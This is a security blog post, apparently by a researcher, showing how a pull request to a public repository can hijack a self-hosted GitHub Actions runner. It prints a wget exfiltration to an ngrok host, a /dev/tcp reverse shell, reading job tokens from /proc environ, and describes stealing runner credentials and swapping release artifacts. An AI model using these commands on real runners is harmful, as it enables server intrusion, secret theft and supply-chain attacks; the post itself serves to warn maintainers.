<!DOCTYPE html>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
<html lang="en"><head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  

  <title>
    
      Look mum, I'm the GitHub Runner
    
  </title>

  <!-- Begin Jekyll SEO tag v2.6.1 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Look mum, I’m the GitHub Runner" />
<meta name="author" content="David Fernandez" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="********************************************************************** ********************************************************************** ********************************************************************** ********************************************************************** *************************NX0kdollccccllodk0XN************************* ********************WNOdc;.. ...,cdONW******************** *****************WXkl,. .,lkX****************** ***************WKo,. .,oKW*************** *************WKo&#39; .oKW************* ************Nx,. .,&#39;.. ..&#39;,. &#39;xN************ ***********Xl. .dNNKko;...&#39;,;;;;;;,&#39;...;okKNNd. .lK*********** **********K:. ,0*****WK0KXNWWWWWWNXK0KW*****0, .:K********** *********Xc. &#39;O****************************O&#39; .cX********* ********Wo. ,0****************************0; .oN******** ********0, ;0W****************************W0;. ,0******** *******Wd. .kW*******************************O&#39; .dW******* *******Nc ;K********************************X: cN******* *******X: ;K********************************X: :X******* *******Nc &#39;0********************************0, cN******* *******Wo. .oN******************************Wo. .oW******* ********O&#39; .xN****************************Wx. &#39;O******** ********Nl. .c0W************************W0l. .lN******** *********K; &#39;;,. .:dOXNW**************WNXOd:. ;K********* *********W0, .,d0Ol. ..,:oK**********Xd:,.. ,0W********* **********W0;. .;ONO;. .oN**********No. .;0W********** ************Xl. &#39;kWNOdllokN************0, .oX************ *************WO:. .lOXNWWWWW************0, .:OW************* ***************NO:. ..,;;;lK************0, .ckN*************** *****************W0o;. ,0************0, .;d0W***************** ********************N0xc,..:K************K:..,cx0N******************** ************************NK0XW************WX0KN************************ ********************************************************************** ********************************************************************** ********************************************************************** **********************************************************************" />
<meta property="og:description" content="********************************************************************** ********************************************************************** ********************************************************************** ********************************************************************** *************************NX0kdollccccllodk0XN************************* ********************WNOdc;.. ...,cdONW******************** *****************WXkl,. .,lkX****************** ***************WKo,. .,oKW*************** *************WKo&#39; .oKW************* ************Nx,. .,&#39;.. ..&#39;,. &#39;xN************ ***********Xl. .dNNKko;...&#39;,;;;;;;,&#39;...;okKNNd. .lK*********** **********K:. ,0*****WK0KXNWWWWWWNXK0KW*****0, .:K********** *********Xc. &#39;O****************************O&#39; .cX********* ********Wo. ,0****************************0; .oN******** ********0, ;0W****************************W0;. ,0******** *******Wd. .kW*******************************O&#39; .dW******* *******Nc ;K********************************X: cN******* *******X: ;K********************************X: :X******* *******Nc &#39;0********************************0, cN******* *******Wo. .oN******************************Wo. .oW******* ********O&#39; .xN****************************Wx. &#39;O******** ********Nl. .c0W************************W0l. .lN******** *********K; &#39;;,. .:dOXNW**************WNXOd:. ;K********* *********W0, .,d0Ol. ..,:oK**********Xd:,.. ,0W********* **********W0;. .;ONO;. .oN**********No. .;0W********** ************Xl. &#39;kWNOdllokN************0, .oX************ *************WO:. .lOXNWWWWW************0, .:OW************* ***************NO:. ..,;;;lK************0, .ckN*************** *****************W0o;. ,0************0, .;d0W***************** ********************N0xc,..:K************K:..,cx0N******************** ************************NK0XW************WX0KN************************ ********************************************************************** ********************************************************************** ********************************************************************** **********************************************************************" />
<link rel="canonical" href="http://0.0.0.0:4000/2024/05/01/cicd.html" />
<meta property="og:url" content="http://0.0.0.0:4000/2024/05/01/cicd.html" />
<meta property="og:site_name" content="Litios Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-05-01T00:00:00+02:00" />
<script type="application/ld+json">
{"headline":"Look mum, I’m the GitHub Runner","url":"http://0.0.0.0:4000/2024/05/01/cicd.html","datePublished":"2024-05-01T00:00:00+02:00","dateModified":"2024-05-01T00:00:00+02:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/2024/05/01/cicd.html"},"author":{"@type":"Person","name":"David Fernandez"},"@type":"BlogPosting","description":"********************************************************************** ********************************************************************** ********************************************************************** ********************************************************************** *************************NX0kdollccccllodk0XN************************* ********************WNOdc;.. ...,cdONW******************** *****************WXkl,. .,lkX****************** ***************WKo,. .,oKW*************** *************WKo&#39; .oKW************* ************Nx,. .,&#39;.. ..&#39;,. &#39;xN************ ***********Xl. .dNNKko;...&#39;,;;;;;;,&#39;...;okKNNd. .lK*********** **********K:. ,0*****WK0KXNWWWWWWNXK0KW*****0, .:K********** *********Xc. &#39;O****************************O&#39; .cX********* ********Wo. ,0****************************0; .oN******** ********0, ;0W****************************W0;. ,0******** *******Wd. .kW*******************************O&#39; .dW******* *******Nc ;K********************************X: cN******* *******X: ;K********************************X: :X******* *******Nc &#39;0********************************0, cN******* *******Wo. .oN******************************Wo. .oW******* ********O&#39; .xN****************************Wx. &#39;O******** ********Nl. .c0W************************W0l. .lN******** *********K; &#39;;,. .:dOXNW**************WNXOd:. ;K********* *********W0, .,d0Ol. ..,:oK**********Xd:,.. ,0W********* **********W0;. .;ONO;. .oN**********No. .;0W********** ************Xl. &#39;kWNOdllokN************0, .oX************ *************WO:. .lOXNWWWWW************0, .:OW************* ***************NO:. ..,;;;lK************0, .ckN*************** *****************W0o;. ,0************0, .;d0W***************** ********************N0xc,..:K************K:..,cx0N******************** ************************NK0XW************WX0KN************************ ********************************************************************** ********************************************************************** ********************************************************************** **********************************************************************","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  <link type="application/atom+xml" rel="alternate" href="http://0.0.0.0:4000/feed.xml" title="Litios Blog" />

  <link rel="shortcut icon" type="image/x-icon" href="/./logo.ico" />
  <link rel="stylesheet" href="http://0.0.0.0:4000/assets/css/main.css" />
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons"
      rel="stylesheet">
</head>
<body a="light" style="color: #f2f2f2">
    <main class="page-content" aria-label="Content">
        <div class="w">
            <div style="display: flex; justify-content: space-between;">
<a style="font-size: 2em;" href="http://0.0.0.0:4000">..</a>
<span onClick="if (document.body.style.color != 'rgb(242, 242, 242)'){
document.body.style.color = '#f2f2f2'; document.body.style.backgroundColor = '#202324';
} else {
document.body.style.color = 'black'; document.body.style.backgroundColor = 'white';
}
" class="material-icons" style="
    cursor: pointer;
    display:flex;
    flex-direction:column;
    justify-content:end;
    align-items:center;
">visibility</span>
</div>
<br><br><br>
<pre style="font-size: 1vw; text-align: center">
**********************************************************************
**********************************************************************
**********************************************************************
**********************************************************************
*************************NX0kdollccccllodk0XN*************************
********************WNOdc;..             ...,cdONW********************
*****************WXkl,.                        .,lkX******************
***************WKo,.                              .,oKW***************
*************WKo'                                    .oKW*************
************Nx,.    .,'..                    ..',.     'xN************
***********Xl.     .dNNKko;...',;;;;;;,'...;okKNNd.     .lK***********
**********K:.      ,0*****WK0KXNWWWWWWNXK0KW*****0,      .:K**********
*********Xc.       'O****************************O'       .cX*********
********Wo.        ,0****************************0;        .oN********
********0,        ;0W****************************W0;.       ,0********
*******Wd.       .kW*******************************O'       .dW*******
*******Nc        ;K********************************X:        cN*******
*******X:        ;K********************************X:        :X*******
*******Nc        '0********************************0,        cN*******
*******Wo.       .oN******************************Wo.       .oW*******
********O'        .xN****************************Wx.        'O********
********Nl.        .c0W************************W0l.        .lN********
*********K;    ';,.  .:dOXNW**************WNXOd:.          ;K*********
*********W0,  .,d0Ol.   ..,:oK**********Xd:,..            ,0W*********
**********W0;.  .;ONO;.    .oN**********No.             .;0W**********
************Xl.   'kWNOdllokN************0,            .oX************
*************WO:.  .lOXNWWWWW************0,          .:OW*************
***************NO:.  ..,;;;lK************0,        .ckN***************
*****************W0o;.     ,0************0,     .;d0W*****************
********************N0xc,..:K************K:..,cx0N********************
************************NK0XW************WX0KN************************
**********************************************************************
**********************************************************************
**********************************************************************
**********************************************************************
</pre>

<h2 id="summary">Summary</h2>

<p>In this article, I will explore the problems and dangers of using self-hosted GitHub runners in public repositories, as well as several attack vectors.</p>

<h2 id="introduction">Introduction</h2>

<p>The other day, I was looking for ideas for a different kind of challenge for a future CTF I was organizing when my colleague Mark Esler (@eslerm) pointed me to <a href="https://github.com/messypoutine/">Messy poutine</a>. It is a fun CTF-style GitHub organization that provides some vulnerable CI/CD jobs for which you need to collect some flags.</p>

<blockquote>
  <p>Go check their amazing talk on CI/CD 0-day analysis on OSS: 
<strong>Under the Radar: How we found 0-days in the Build Pipeline of OSS Packages</strong></p>
</blockquote>

<p>While taking a look at the <a href="https://github.com/messypoutine/gravy-overflow/blob/main/.github/workflows/level2.yml">last challenge</a>, I researched a little bit more about <code class="language-plaintext highlighter-rouge">runs-on: self-hosted</code>, which is not the most used runner when deploying CI/CD pipelines, thinking that the challenge may have something to do with this.</p>

<blockquote>
  <p>Fun fact: the actual challenge couldn’t be solved because the self-hosted container was not online but it pushed me to look forward</p>
</blockquote>

<p>With this in mind, I forked the repo, raised a self-hosted runner and started playing.</p>

<h2 id="attack-surface-pull-request">Attack surface: pull request</h2>

<p>The first thing I noticed is that the pipeline would trigger on a pull request.</p>

<p>Now, can I create a PR updating from <code class="language-plaintext highlighter-rouge">self-hosted</code> to <code class="language-plaintext highlighter-rouge">ubuntu-latest</code> and <strong>actually</strong> execute the pipeline on the original repo? And it worked. Wow.</p>

<p>From there, I read more about <code class="language-plaintext highlighter-rouge">ACTIONS_RUNNER_DEBUG: true</code> and <code class="language-plaintext highlighter-rouge">ACTIONS_STEP_DEBUG: true</code> which seemed like the intended solution but then it hit my mind: if it’s a pull request, why not update the pipeline itself?</p>

<p>I changed</p>

<p><code class="language-plaintext highlighter-rouge">- run: echo "Sorry, this level is not ready yet.... or is it?!"</code></p>

<p>to</p>

<p><code class="language-plaintext highlighter-rouge">- run: wget https://XXXXXXXX.ngrok-free.app/$FLAG</code></p>

<p>and… <a href="https://github.com/litios/cicd/actions/runs/8835512260/job/24259832005">it worked</a> (kinda). I received the request but FLAG was empty.</p>

<p>Wait, does that mean I can use the GitHub-runner token and use it to manipulate the repo?</p>

<hr />

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">jobs</span><span class="pi">:</span>
  <span class="na">attempt</span><span class="pi">:</span>
    <span class="na">runs-on</span><span class="pi">:</span> <span class="s">ubuntu-latest</span>
    <span class="na">timeout-minutes</span><span class="pi">:</span> <span class="m">1</span>
    <span class="na">permissions</span><span class="pi">:</span>
      <span class="na">id-token</span><span class="pi">:</span> <span class="s">write</span>
      <span class="na">contents</span><span class="pi">:</span> <span class="s">write</span>
      <span class="na">issues</span><span class="pi">:</span> <span class="s">write</span>
    <span class="na">env</span><span class="pi">:</span>
      <span class="na">GH_TOKEN</span><span class="pi">:</span> <span class="s">$</span>
    <span class="na">steps</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span>
          <span class="s">gh auth status</span>
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Run gh auth status
github.com
  ✓ Logged in to github.com account github-actions[bot] (GH_TOKEN)
  - Active account: true
  - Git operations protocol: https
  - Token: ghs_************************************
</code></pre></div></div>
<p>As expected, this didn’t work. GitHub will indeed execute the pipeline but this will be dropped into a GitHub runner without any privileges. Trying to execute any <code class="language-plaintext highlighter-rouge">gh</code> command or any GitHub API queries will result in 403. Also, any secrets are not passed to the pipeline.</p>

<blockquote>
  <p>Side note: the default configuration for a new repository is that any new contributors will require approval in order to run any external pipelines. Still, this can be disabled so everyone can run it (and I’m pretty sure there are repositories out there with it enabled)</p>
</blockquote>

<p>At this point, I was no longer interested in the challenge but more in what could I do with this so I went back to playing with my own self-hosted runner.</p>

<h2 id="compromising-the-server">Compromising the server</h2>

<p>To set up a self-hosted runner, all you need to do is follow the steps pointed by GitHub:</p>

<ol>
  <li>Download the compressed runner code.</li>
  <li>Configure against the repo with a token</li>
  <li>Run it</li>
</ol>

<p>And it will start receiving jobs.</p>

<p>With this in mind, knowing the self-hosted runner will run <strong>any</strong> code I pass, my next attempt was (as anyone will do) to try to execute a shell.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="na">steps</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span>
          <span class="s">bash -i &gt;&amp; /dev/tcp/XXXXXX/4444 0&gt;&amp;1</span>
</code></pre></div></div>
<p>Update the code, push again and… I got a reverse shell.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Listening on 0.0.0.0 4444
Connection received on XXXXXXX 48520
cicd@9a24bf4daf97:~/actions-runner/_work/cicd/cicd
</code></pre></div></div>

<p>Cool, I guess I’m an unprivileged user, right…? A quick <code class="language-plaintext highlighter-rouge">id</code> showed that I was the same user as the one that set up the self-hosted runner.</p>

<p>Can I read stuff? Yes.</p>

<p>Can I edit stuff? Yes.</p>

<p>A regular shell, the same privileges as I had when I first enabled the runner.</p>

<p>Interesting enough, even if the original repository doesn’t have any workflows at all, this will still trigger as the newly created repos have the option of <code class="language-plaintext highlighter-rouge">Allow all actions and reusable workflows</code> enabled by default.</p>

<p><img src="/./assets/imgs/cicd-empty.png" /></p>

<h2 id="potential-attacks">Potential attacks</h2>

<p>At this point, the damage is already done. You don’t <strong>own</strong> the server (as you are not root and the runner will prevent you from running as root) but you can do some pretty nasty stuff.</p>

<p>But now I want to explore potential vectors and attack surfaces.</p>

<h3 id="privilege-escalation-and-server-ownership">Privilege escalation and server ownership</h3>

<p>The default attack would be to attempt privilege escalation and try to own the server. Default privesc, I didn’t find any extra interest in this as it falls outside of the point of this experiment.</p>

<h3 id="token-hijacking">Token hijacking</h3>

<p>Once you control the runner, you can see every other job being executed.</p>

<p>As we already discussed, the token provided by GitHub won’t have any privileges in our PR pipeline, but all we need to do is wait for another job from an actual contributor to run on the runner.</p>

<p>We can wait for a work to happen and then we would be able to leak all the secrets used in the job, including the GitHub token, since we can access the environment and final script being run.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>ps aux | <span class="nb">grep </span>_work
cicd        3752  0.0  0.0   4368  2944 pts/0    S+   12:56   0:00 /usr/bin/bash <span class="nt">-e</span> /home/cicd/actions-runner/_work/_temp/XXXXXX.sh
<span class="nv">$ </span><span class="nb">cat</span> /proc/3752/environ 
<span class="nv">GITHUB_TOKEN</span><span class="o">=</span>ghs_XXXXXXXXXXXXXXXX
<span class="nv">GITHUB_JOB</span><span class="o">=</span><span class="nb">test
</span><span class="nv">GITHUB_REF</span><span class="o">=</span>refs/heads/master
<span class="nv">GITHUB_SHA</span><span class="o">=</span>XXXXXX
<span class="nv">GITHUB_REPOSITORY</span><span class="o">=</span>XXXXX/XXXX
<span class="nv">GITHUB_REPOSITORY_OWNER</span><span class="o">=</span>XXXXXXX
<span class="nv">GITHUB_REPOSITORY_OWNER_ID</span><span class="o">=</span>XXXXXX
<span class="nv">GITHUB_RUN_ID</span><span class="o">=</span>XXXXXX
<span class="nv">GITHUB_RUN_NUMBER</span><span class="o">=</span>1
<span class="nv">GITHUB_RETENTION_DAYS</span><span class="o">=</span>90
<span class="nv">GITHUB_RUN_ATTEMPT</span><span class="o">=</span>2
...
</code></pre></div></div>

<p>With the right permissions, this will mean we could modify the repository content.</p>

<h3 id="runner-hijacking">Runner hijacking</h3>

<p>Maybe the environment is a little restricted. Maybe we cannot run or do what we would like to do.</p>

<p>No worries, just replace the runner! Since we have the same account as the runner, we can read the configuration files deployed during the auth step: <code class="language-plaintext highlighter-rouge">.runner</code>, <code class="language-plaintext highlighter-rouge">.credentials</code> and <code class="language-plaintext highlighter-rouge">.credentials.</code></p>

<p>All we need to do is deploy the runner code in our own server, prepare the files with the same contents, disable the original runner (since we can stop the processes) and then run our own. Even a small network issue that may disconnect the runner may be used to our advantage since our runner will jump right in and the other one won’t be able to reconnect as we already have a session active. The original runner script won’t fail though, repeatedly trying to reconnect.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-rw-rw-r-- 1 cicd cicd       266 May  1 11:52 .credentials
-rw------- 1 cicd cicd      1667 May  1 11:51 .credentials_rsaparams
-rw-rw-r-- 1 cicd cicd         0 May  1 11:51 .env
-rw-rw-r-- 1 cicd cicd        99 May  1 11:52 .path
-rw-rw-r-- 1 cicd cicd       292 May  1 11:52 .runner
</code></pre></div></div>

<p>The change will happen instantly and transparently, and now we are the runner.</p>

<h3 id="supply-chain-attack">Supply chain attack</h3>

<p>The coolest trick would be to go fully unnoticed. We all know how destructive the xz backdoor attempt could have been.</p>

<p>If the GitHub repository holds a package that is distributed from the pipelines, we can use this to our advantage.</p>

<p>All we need to do is prepare our malicious artifact and once the pipeline is triggered in the server, replace the crafted artifact with our own and it will be uploaded to the public repo without anyone noticing.</p>

<p>If we don’t have full control of the server, all we need to do is combine this with the previous attack and we will be ready!</p>

<p>This is extremely dangerous since everything will look perfectly fine from the pipeline side, logs won’t show anything different from any other run and there won’t be any proof of anything happening on the repo or the runner (unless the runner is monitored and hardened, but again, we can default to the previous attack)</p>

<p><img src="/./assets/imgs/cicd-supply-chain.png" /></p>

<h2 id="final-thoughts">Final thoughts</h2>

<p>What I have explored in this analysis is something that GitHub already warns <a href="https://docs.github.com/en/actions/hosting-your-own-runners/managing-self-hosted-runners/about-self-hosted-runners#self-hosted-runner-security">in their documentation</a></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>We recommend that you only use self-hosted runners with private repositories. This is because forks of your public repository can potentially run dangerous code on your self-hosted runner machine by creating a pull request that executes the code in a workflow.
</code></pre></div></div>

<p>Hopefully, this blog post makes you think twice before enabling a self-hosted runner in your public repository.</p>


        </div>
    </main>

    
    </body>
</html>